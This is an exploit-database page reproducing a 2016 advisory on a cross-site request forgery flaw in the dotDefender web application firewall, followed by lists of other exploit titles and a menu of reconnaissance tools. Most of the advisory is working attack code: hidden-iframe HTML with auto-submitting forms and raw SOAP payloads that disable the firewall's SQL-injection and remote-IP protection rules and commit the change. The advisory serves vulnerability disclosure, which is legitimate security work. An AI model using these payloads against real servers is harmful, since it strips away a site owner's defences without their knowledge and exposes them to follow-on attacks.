"dotDefender Firewall 5.00.12865/5.13-13282 - Cross-Site Request Forgery"

Author

Exploit author

hyp3rlinx

Platform

Exploit platform

multiple

Release date

Exploit published date

2016-02-08

                
                    
                         Download file
                    
                
            
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/DOT-DEFENDER-CSRF.txt


Vendor:
==================
www.applicure.com


Product:
=====================
dotDefender Firewall
Versions: 5.00.12865 / 5.13-13282


dotDefender is a Web application firewall (WAF) for preventing hacking
attacks like XSS, SQL Injections, CSRF etc...
that provides Apache and IIS Server Security across Dedicated, VPS and
Cloud environments. It meets PCI Compliance and also
provides E-Commerce Security, IIS and Apache Security, Cloud Security and
more.


Vulnerability Type:
=================================
Cross Site Request Forgery - CSRF


CVE Reference:
==============
N/A


Vulnerability Details:
=====================
Dotdefender firewall (WAF) is vulnerable to cross site request forgery,
this allows attackers to make HTTP requests via the victims browser to
the dotdefender management server on behalf of the victim if the victim is
logged in and visits a malicious web page or clicks an infected link.
Result can be modifying or disabling various firewall patterns,
User-Defined Rule settings and global event logging etc...


HTTP requests sent to Dotdefender to enable or disable user-Defined rule
settings are base64 encoded using SOAP protocol.
Sending the below base64 value for example disables a Dotdefender firewall
setting.

PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
<enabled>false</enabled>


Tested successfully on Windows & Linux:

dotDefender Version:          5.00.12865
Web Server Type:              Microsoft-IIS
Server Operating System:      Windows
Web Server Version:           7.5
Firefox web browser


dotDefender Version:     5.13-13282
Web Server Type:     Apache
Server Operating System:     Linux


Exploit code(s):
===============

Example to send requests to disable firewall rule settings that defends
against SQL injection.
We need to send two requests first to modify the desired settings and
second to commit our changes.


HTTP request 0x01 - send following soap request to disable SQL Injection
request firewall rule
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~

<IFRAME style="display:none" name="demonica"></IFRAME>

<form target="demonica" id="SACRIFICIAL" action="
http://localhost/dotDefender/dotDefenderWS.exe" ENCTYPE="text/plain"
 method="post" onsubmit="TORMENT()">
<input type="hidden" name='<soapenv:Envelope xmlns:xsi="
http://www.w3.org/2001/XMLSchema-instance"
 xmlns:xsd="http://www.w3.org/2001/XMLSchema"
 xmlns:ZSI="http://www.zolera.com/schemas/ZSI/"
 xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
 xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
 soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <soapenv:Body xmlns:ns1="http://applicure.com/dotDefender">
 <ns1:set_xpath><site xsi:type="xsd:string">0</site>
 <xpath
xsi:type="xsd:string">/ud_rules/request_rules/request_rule[rule_id=1]/enabled</xpath>
 <xml xsi:type="xsd:base64Binary">PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+</xml>
 </ns1:set_xpath></soapenv:Body></soapenv:Envelope>'>
<script>document.getElementById('SACRIFICIAL').submit()</script>
</form>


HTTP request 0x02 - send the next request to commit the changes
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~

<form target="demonica" id="VICTIM" action="
http://localhost/dotDefender/dotDefenderWS.exe" ENCTYPE="text/plain"
 method="post">
<input type="hidden" name='<soapenv:Envelope xmlns:xsi="
http://www.w3.org/2001/XMLSchema-instance"
 xmlns:xsd="http://www.w3.org/2001/XMLSchema"
 xmlns:ZSI="http://www.zolera.com/schemas/ZSI/"
 xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
 xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
 soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <soapenv:Body xmlns:ns1="http://applicure.com/dotDefender"><ns1:commit>
 <sites><element0 id="0" xsi:type="xsd:string">0</element0></sites>
 </ns1:commit></soapenv:Body></soapenv:Envelope>'>
<script>function
TORMENT(){document.getElementById('VICTIM').submit()}</script>
</form>



Other SOAP payload examples for rule disabling:
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=

this is disable a rule #19, send the below request to disable remote IP
protections:

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ZSI="
http://www.zolera.com/schemas/ZSI/"
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="
http://schemas.xmlsoap.org/soap/encoding/"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soapenv:Body xmlns:ns1="http://applicure.com/dotDefender"><ns1:set_xpath><site
xsi:type="xsd:string">0</site>
<xpath
xsi:type="xsd:string">/ud_rules/request_rules/request_rule[rule_id=19]/enabled</xpath>
<xml
xsi:type="xsd:base64Binary">PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+</xml></ns1:set_xpath></soapenv:Body></soapenv:Envelope>


disable rule 20:
~=~=~=~=~=~=~=~=

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:ZSI="http://www.zolera.com/schemas/ZSI/" xmlns:SOAP-ENV="
http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:soapenv="
http://schemas.xmlsoap.org/soap/envelope/"
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soapenv:Body
xmlns:ns1="http://applicure.com/dotDefender">
<ns1:set_xpath><site xsi:type="xsd:string">0</site><xpath
xsi:type="xsd:string">/ud_rules/request_rules/request_rule[rule_id=20]/enabled</xpath>
<xml
xsi:type="xsd:base64Binary">PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+</xml></ns1:set_xpath></soapenv:Body></soapenv:Envelope>


Finally commit them with below request:
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:ZSI="http://www.zolera.com/schemas/ZSI/" xmlns:SOAP-ENV="
http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:soapenv="
http://schemas.xmlsoap.org/soap/envelope/"
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soapenv:Body
xmlns:ns1="http://applicure.com/dotDefender">
<ns1:commit><sites><element0 id="0"
xsi:type="xsd:string">0</element0></sites></ns1:commit></soapenv:Body></soapenv:Envelope>




Disclosure Timeline:
================================
Vendor Notifications:

initial report 11/16/2015
vendor response 11/20/2015
vendor delays for two months
1/19/2016 Vendor finally acknowledges vulnerability
inform vendor of a disclosure date
vendor no longer responds
Feb 8, 2016 : Public Disclosure


Exploitation Technique:
=======================
Remote


Severity Level:
==================
High


Description:
==========================================================

Request Method(s):           [+] POST


Vulnerable Product:          [+] DotDefender v5.0 & v5.13

===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"Expense Management System - 'description' Stored Cross Site Scripting"	webapps	multiple	"Nikhil Kumar"
2020-12-02	"Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting"	webapps	multiple	"Parshwa Bhavsar"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"ILIAS Learning Management System 4.3 - SSRF"	webapps	multiple	Dot
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"Under Construction Page with CPanel 1.0 - SQL injection"	webapps	multiple	"Mayur Parmar"

Release Date	Title	Type	Platform	Author
2020-09-16	"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software"	local	windows	hyp3rlinx
2020-08-26	"Ericom Access Server x64 9.2.0 - Server-Side Request Forgery"	webapps	multiple	hyp3rlinx
2020-07-07	"Microsoft Windows mshta.exe 2019 - XML External Entity Injection"	remote	xml	hyp3rlinx
2020-06-12	"Avaya IP Office 11 - Password Disclosure"	webapps	multiple	hyp3rlinx
2020-06-10	"HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)"	remote	multiple	hyp3rlinx
2020-06-10	"WinGate 9.4.1.5998 - Insecure Folder Permissions"	local	windows	hyp3rlinx
2020-04-21	"Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption"	remote	windows	hyp3rlinx
2020-04-06	"Microsoft NET USE win10 - Insufficient Authentication Logic"	local	windows	hyp3rlinx
2020-02-12	"HP System Event Utility - Local Privilege Escalation"	local	windows	hyp3rlinx
2020-01-21	"NEOWISE CARBONFTP 1.4 - Weak Password Encryption"	local	windows	hyp3rlinx
2020-01-17	"Trend Micro Maximum Security 2019 - Privilege Escalation"	local	windows	hyp3rlinx
2020-01-17	"Trend Micro Maximum Security 2019 - Arbitrary Code Execution"	local	windows	hyp3rlinx
2020-01-06	"Microsoft Outlook VCF cards - Denial of Service (PoC)"	dos	windows	hyp3rlinx
2020-01-01	"Microsoft Windows .Group File - Code Execution"	local	windows	hyp3rlinx
2019-12-03	"Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass"	local	xml	hyp3rlinx
2019-12-02	"Visual Studio 2008 - XML External Entity Injection"	local	xml	hyp3rlinx
2019-12-02	"Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions"	local	windows	hyp3rlinx
2019-12-02	"Microsoft Excel 2016 1901 - XML External Entity Injection"	local	xml	hyp3rlinx
2019-11-13	"ScanGuard Antivirus 2020 - Insecure Folder Permissions"	local	windows	hyp3rlinx
2019-10-21	"Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution"	local	windows	hyp3rlinx
2019-09-06	"Windows NTFS - Privileged File Access Enumeration"	local	windows	hyp3rlinx
2019-08-14	"Windows PowerShell - Unsanitized Filename Command Execution"	dos	windows	hyp3rlinx
2019-07-24	"Trend Micro Deep Discovery Inspector IDS - Security Bypass"	remote	multiple	hyp3rlinx
2019-07-17	"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow"	remote	windows	hyp3rlinx
2019-07-16	"Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection"	dos	windows	hyp3rlinx
2019-06-17	"HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write"	dos	windows	hyp3rlinx
2019-05-03	"Windows PowerShell ISE - Remote Code Execution"	local	windows	hyp3rlinx
2019-04-12	"Microsoft Internet Explorer 11 - XML External Entity Injection"	local	windows	hyp3rlinx
2019-03-13	"Microsoft Windows - .reg File / Dialog Box Message Spoofing"	dos	windows	hyp3rlinx
2019-01-23	"Microsoft Windows CONTACT - HTML Injection / Remote Code Execution"	local	windows	hyp3rlinx

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"dotDefender Firewall 5.00.12865/5.13-13282 - Cross-Site Request Forgery"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.